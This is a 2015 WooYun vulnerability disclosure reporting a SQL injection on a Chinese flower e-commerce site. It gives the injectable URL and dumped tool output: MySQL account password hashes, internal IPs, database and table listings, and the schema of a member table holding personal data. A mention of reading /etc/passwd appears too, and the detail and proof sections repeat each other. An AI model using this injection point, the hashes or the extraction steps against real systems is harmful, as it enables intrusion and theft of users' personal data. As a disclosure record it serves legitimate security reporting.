当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118563

漏洞标题:花集网某站存在注入(root权限,涉及全部数据)

相关厂商:浙江花集网科技有限公司

漏洞作者: 路人甲

提交时间:2015-06-06 10:50

修复时间:2015-07-23 11:14

公开时间:2015-07-23 11:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-06: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开

简要描述:

这么多数据不来个高rank?

详细说明:

http://xue.huaji.com/space/business.php?u=1199795328 注入点
跑一下

Target: 		http://xue.huaji.com/space/business.php?u=1199795328
Host IP: 120.199.8.178
Web Server: nginx/1.0.15
Powered-by: PHP/5.3.3
DB Server: MySQL >=5
Resp. Time(avg): 129 ms
Current User: ourbloom@192.168.1.181
Sql Version: 5.1.52
Current DB: hj
System User: ourbloom@192.168.1.10
Host Name: ourbloom15
Installation dir: /usr/
DB User & Pass: root:*FEBDA9A686B54CD76590CA68C08BA30F37716241:localhost
root::ourbloom05
root::127.0.0.1
::localhost
::ourbloom05
root:*583A6270E3FE9F8F17AA1C3A10136036FF54483F:%
ourbloom:*583A6270E3FE9F8F17AA1C3A10136036FF54483F:%
huajislave:*1B9EC305FF2E54E321FDADA09CE2C3C80CD2C650:192.168.1.1
huajislave:*1B9EC305FF2E54E321FDADA09CE2C3C80CD2C650:183.129.221.18
huajislave:*C35168029981CD1521844D3F2E2DFC073AF4A90C:%
huajiourbloom:*390EA1B0A375E0FB94E2FB709945E956114E91AF:%
huajislave18:*C35168029981CD1521844D3F2E2DFC073AF4A90C:183.129.221.18
huajislave18:*C35168029981CD1521844D3F2E2DFC073AF4A90C:%
hulonglong:*68A06D921D044601680BEEB7524E3E6486553F1D:183.129.221.18
yushui:*1FA109D10CE615BF44BA9C590E43B8893F85A25F:%
huajislave185:*C35168029981CD1521844D3F2E2DFC073AF4A90C:192.168.1.185
huajislave185:*C35168029981CD1521844D3F2E2DFC073AF4A90C:192.168.1.190
jiankongbao:*D884AD9E536EF5152D4F08EF66DAED7D9DAAAF67:192.168.1.181
Data Bases: information_schema
hj
hj1
hj2
hj3
hj4
hj5
hj6
hj7
hj8
hj9
hj_auction
hj_market
hj_office
hwxbbs
mysql
seociku
test


各种数据各种有啊,/etc/passwd读一下

QQ截图20150606012605.jpg


当前库的

Database: hj
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| goods_property | 211403 |
| rebate_logs | 123184 |
| rebates | 55829 |
| member_apply | 47441 |
| member | 46027 |
| member_extend | 46027 |
| seller_apply | 40891 |
| cms_articleextend | 36373 |
| cms_articlecontent | 36247 |
| cms_article | 35900 |
| goods_image | 34434 |
| seller | 27720 |
| quote | 26372 |
| goods_apply | 24872 |
| seller_map | 22281 |
| member_point | 21020 |
| card | 19263 |
| goods | 18567 |
| charge_seller | 16545 |
| member_study | 13365 |
| answer | 12657 |
| category_goods | 11554 |
| sponsion | 11332 |
| gcategory | 10799 |
| goods_price | 10046 |
| certify_log | 8014 |
| sponsion_apply | 7985 |
| question | 7884 |
| member_job | 7004 |
| flower_apply | 6541 |
| property_value | 5566 |
| address | 5271 |
| seller_cooperation | 4603 |
| employee_resource | 4301 |
| ad_region | 3567 |
| fbwords | 3416 |
| region | 3285 |
| collect | 3215 |
| member_ability | 2809 |
| employee_allowcode | 2308 |
| seller_plan | 2261 |
| cart | 2025 |
| prefer_member | 1926 |
| order_complaint | 1793 |
| sponsion_plan | 1714 |
| seller_region | 1698 |
| excellent_apply | 1472 |
| ad_search_old | 1419 |
| resource | 1247 |
| cms_attach | 1240 |
| property | 1062 |
| seller_domain | 909 |
| noshop | 908 |
| seller_link | 906 |
| seller_decoration | 864 |
| image_property | 786 |
| seller_punish | 687 |
| product_library | 592 |
| goods_holiday | 548 |
| ad_region_order | 527 |
| florist_log | 417 |
| excellent_region | 413 |
| image | 378 |
| member_astrict | 317 |
| seller_rights | 315 |
| ad_region_right | 291 |
| video_property | 273 |
| admin_menu | 262 |
| seller_ratio | 258 |
| inform | 251 |
| image_log | 229 |
| excellent | 217 |
| ad_order | 203 |
| feedback | 191 |
| member_foul | 190 |
| charge | 178 |
| compen_logs | 141 |
| cms_comment | 138 |
| goods_holiday_master | 137 |
| member_mobile_change | 116 |
| goods_qa | 95 |
| seller_festival | 94 |
| compensation | 93 |
| rebate_log_hj | 93 |
| ad_region_banner | 85 |
| member_id_change | 80 |
| seller_member | 77 |
| member_cancel | 72 |
| inform_log | 65 |
| prefer | 65 |
| shop_feedback | 62 |
| employee | 53 |
| appeal | 47 |
| ad_region_pic | 45 |
| store_cancel | 45 |
| astrict_white | 44 |
| florist | 43 |
| topic | 43 |
| member_id_changelog | 38 |
| seller_limit_master | 36 |
| quote_product | 35 |
| video | 35 |
| brand_apply | 23 |
| bill_ourbloom | 19 |
| bill_bank | 17 |
| product_librarycate | 17 |
| cms_column | 13 |
| dept | 12 |
| sms_template | 12 |
| print_template | 11 |
| seller_limit | 11 |
| member_stint | 9 |
| video_log | 8 |
| mgrade | 7 |
| friend_link | 6 |
| topic_cat | 5 |
| fbwords_seller | 4 |
| question_cat | 4 |
| auto_status | 3 |
| excellent_price | 3 |
| seller_price | 3 |
| goods_rights | 1 |
| setting | 1 |
+----------------------+---------+


4w+的会员数据

Table: member
[52 columns]
+------------------+------------------+
| Column | Type |
+------------------+------------------+
| activation | varchar(60) |
| address | varchar(256) |
| alipay_uid | varchar(60) |
| birthday | date |
| buyer_credit | float(8,0) |
| charges | decimal(6,2) |
| charges_status | tinyint(4) |
| chinese_city | varchar(32) |
| chinese_country | varchar(32) |
| chinese_province | varchar(32) |
| chinese_town | varchar(32) |
| city | varchar(8) |
| cost_ratio | decimal(6,2) |
| country | varchar(8) |
| default_feed | tinyint(4) |
| email | varchar(60) |
| expiry | int(11) |
| feed_config | text |
| gender | tinyint(4) |
| guider | varchar(20) |
| home_phone | varchar(60) |
| huaji_flag | tinyint(4) |
| id | int(11) |
| last_ip | varchar(15) |
| last_login | int(11) |
| mobile_phone | varchar(60) |
| msn | varchar(60) |
| office_phone | varchar(60) |
| operator | varchar(50) |
| outer_id | int(11) |
| password | varchar(32) |
| portrait | varchar(256) |
| province | varchar(8) |
| ptemplate | tinyint(4) |
| qq | varchar(60) |
| qq_uid | varchar(100) |
| real_name | varchar(60) |
| reg_ip | varchar(15) |
| reg_time | int(11) |
| repwd_code | varchar(32) |
| seller_credit | float(8,0) |
| sina_uid | int(11) |
| source_pwd | varchar(32) |
| store_id | int(11) |
| taobao_uid | int(11) |
| test | tinyint(4) |
| town | varchar(8) |
| ugrade | tinyint(4) |
| updatetime | int(11) unsigned |
| user_name | varchar(60) |
| visit_count | int(11) |
| zip | char(6) |
+------------------+------------------+


qq,淘宝id,新浪id,地址,真实姓名。。。。
跑了几个证明一下

QQ截图20150606013647.jpg


本着发现问题解决问题的原则,就没再继续渗透

漏洞证明:

http://xue.huaji.com/space/business.php?u=1199795328 注入点
跑一下

Target: 		http://xue.huaji.com/space/business.php?u=1199795328
Host IP: 120.199.8.178
Web Server: nginx/1.0.15
Powered-by: PHP/5.3.3
DB Server: MySQL >=5
Resp. Time(avg): 129 ms
Current User: ourbloom@192.168.1.181
Sql Version: 5.1.52
Current DB: hj
System User: ourbloom@192.168.1.10
Host Name: ourbloom15
Installation dir: /usr/
DB User & Pass: root:*FEBDA9A686B54CD76590CA68C08BA30F37716241:localhost
root::ourbloom05
root::127.0.0.1
::localhost
::ourbloom05
root:*583A6270E3FE9F8F17AA1C3A10136036FF54483F:%
ourbloom:*583A6270E3FE9F8F17AA1C3A10136036FF54483F:%
huajislave:*1B9EC305FF2E54E321FDADA09CE2C3C80CD2C650:192.168.1.1
huajislave:*1B9EC305FF2E54E321FDADA09CE2C3C80CD2C650:183.129.221.18
huajislave:*C35168029981CD1521844D3F2E2DFC073AF4A90C:%
huajiourbloom:*390EA1B0A375E0FB94E2FB709945E956114E91AF:%
huajislave18:*C35168029981CD1521844D3F2E2DFC073AF4A90C:183.129.221.18
huajislave18:*C35168029981CD1521844D3F2E2DFC073AF4A90C:%
hulonglong:*68A06D921D044601680BEEB7524E3E6486553F1D:183.129.221.18
yushui:*1FA109D10CE615BF44BA9C590E43B8893F85A25F:%
huajislave185:*C35168029981CD1521844D3F2E2DFC073AF4A90C:192.168.1.185
huajislave185:*C35168029981CD1521844D3F2E2DFC073AF4A90C:192.168.1.190
jiankongbao:*D884AD9E536EF5152D4F08EF66DAED7D9DAAAF67:192.168.1.181
Data Bases: information_schema
hj
hj1
hj2
hj3
hj4
hj5
hj6
hj7
hj8
hj9
hj_auction
hj_market
hj_office
hwxbbs
mysql
seociku
test


各种数据各种有啊,/etc/passwd读一下

QQ截图20150606012605.jpg


当前库的

Database: hj
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| goods_property | 211403 |
| rebate_logs | 123184 |
| rebates | 55829 |
| member_apply | 47441 |
| member | 46027 |
| member_extend | 46027 |
| seller_apply | 40891 |
| cms_articleextend | 36373 |
| cms_articlecontent | 36247 |
| cms_article | 35900 |
| goods_image | 34434 |
| seller | 27720 |
| quote | 26372 |
| goods_apply | 24872 |
| seller_map | 22281 |
| member_point | 21020 |
| card | 19263 |
| goods | 18567 |
| charge_seller | 16545 |
| member_study | 13365 |
| answer | 12657 |
| category_goods | 11554 |
| sponsion | 11332 |
| gcategory | 10799 |
| goods_price | 10046 |
| certify_log | 8014 |
| sponsion_apply | 7985 |
| question | 7884 |
| member_job | 7004 |
| flower_apply | 6541 |
| property_value | 5566 |
| address | 5271 |
| seller_cooperation | 4603 |
| employee_resource | 4301 |
| ad_region | 3567 |
| fbwords | 3416 |
| region | 3285 |
| collect | 3215 |
| member_ability | 2809 |
| employee_allowcode | 2308 |
| seller_plan | 2261 |
| cart | 2025 |
| prefer_member | 1926 |
| order_complaint | 1793 |
| sponsion_plan | 1714 |
| seller_region | 1698 |
| excellent_apply | 1472 |
| ad_search_old | 1419 |
| resource | 1247 |
| cms_attach | 1240 |
| property | 1062 |
| seller_domain | 909 |
| noshop | 908 |
| seller_link | 906 |
| seller_decoration | 864 |
| image_property | 786 |
| seller_punish | 687 |
| product_library | 592 |
| goods_holiday | 548 |
| ad_region_order | 527 |
| florist_log | 417 |
| excellent_region | 413 |
| image | 378 |
| member_astrict | 317 |
| seller_rights | 315 |
| ad_region_right | 291 |
| video_property | 273 |
| admin_menu | 262 |
| seller_ratio | 258 |
| inform | 251 |
| image_log | 229 |
| excellent | 217 |
| ad_order | 203 |
| feedback | 191 |
| member_foul | 190 |
| charge | 178 |
| compen_logs | 141 |
| cms_comment | 138 |
| goods_holiday_master | 137 |
| member_mobile_change | 116 |
| goods_qa | 95 |
| seller_festival | 94 |
| compensation | 93 |
| rebate_log_hj | 93 |
| ad_region_banner | 85 |
| member_id_change | 80 |
| seller_member | 77 |
| member_cancel | 72 |
| inform_log | 65 |
| prefer | 65 |
| shop_feedback | 62 |
| employee | 53 |
| appeal | 47 |
| ad_region_pic | 45 |
| store_cancel | 45 |
| astrict_white | 44 |
| florist | 43 |
| topic | 43 |
| member_id_changelog | 38 |
| seller_limit_master | 36 |
| quote_product | 35 |
| video | 35 |
| brand_apply | 23 |
| bill_ourbloom | 19 |
| bill_bank | 17 |
| product_librarycate | 17 |
| cms_column | 13 |
| dept | 12 |
| sms_template | 12 |
| print_template | 11 |
| seller_limit | 11 |
| member_stint | 9 |
| video_log | 8 |
| mgrade | 7 |
| friend_link | 6 |
| topic_cat | 5 |
| fbwords_seller | 4 |
| question_cat | 4 |
| auto_status | 3 |
| excellent_price | 3 |
| seller_price | 3 |
| goods_rights | 1 |
| setting | 1 |
+----------------------+---------+


4w+的会员数据

Table: member
[52 columns]
+------------------+------------------+
| Column | Type |
+------------------+------------------+
| activation | varchar(60) |
| address | varchar(256) |
| alipay_uid | varchar(60) |
| birthday | date |
| buyer_credit | float(8,0) |
| charges | decimal(6,2) |
| charges_status | tinyint(4) |
| chinese_city | varchar(32) |
| chinese_country | varchar(32) |
| chinese_province | varchar(32) |
| chinese_town | varchar(32) |
| city | varchar(8) |
| cost_ratio | decimal(6,2) |
| country | varchar(8) |
| default_feed | tinyint(4) |
| email | varchar(60) |
| expiry | int(11) |
| feed_config | text |
| gender | tinyint(4) |
| guider | varchar(20) |
| home_phone | varchar(60) |
| huaji_flag | tinyint(4) |
| id | int(11) |
| last_ip | varchar(15) |
| last_login | int(11) |
| mobile_phone | varchar(60) |
| msn | varchar(60) |
| office_phone | varchar(60) |
| operator | varchar(50) |
| outer_id | int(11) |
| password | varchar(32) |
| portrait | varchar(256) |
| province | varchar(8) |
| ptemplate | tinyint(4) |
| qq | varchar(60) |
| qq_uid | varchar(100) |
| real_name | varchar(60) |
| reg_ip | varchar(15) |
| reg_time | int(11) |
| repwd_code | varchar(32) |
| seller_credit | float(8,0) |
| sina_uid | int(11) |
| source_pwd | varchar(32) |
| store_id | int(11) |
| taobao_uid | int(11) |
| test | tinyint(4) |
| town | varchar(8) |
| ugrade | tinyint(4) |
| updatetime | int(11) unsigned |
| user_name | varchar(60) |
| visit_count | int(11) |
| zip | char(6) |
+------------------+------------------+


qq,淘宝id,新浪id,地址,真实姓名。。。。
跑了几个证明一下

QQ截图20150606013647.jpg


本着发现问题解决问题的原则,没再继续渗透

修复方案:

好好查查代码吧

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-06-08 11:13

厂商回复:

感谢提交

最新状态:

暂无


漏洞评价:

评论

  1. 2015-09-14 11:19 | 憋屈 ( 实习白帽子 | Rank:47 漏洞数:14 | 我是天空里的一片云,偶尔投影在你的波心。)

    你这漏洞是走的小厂商吗?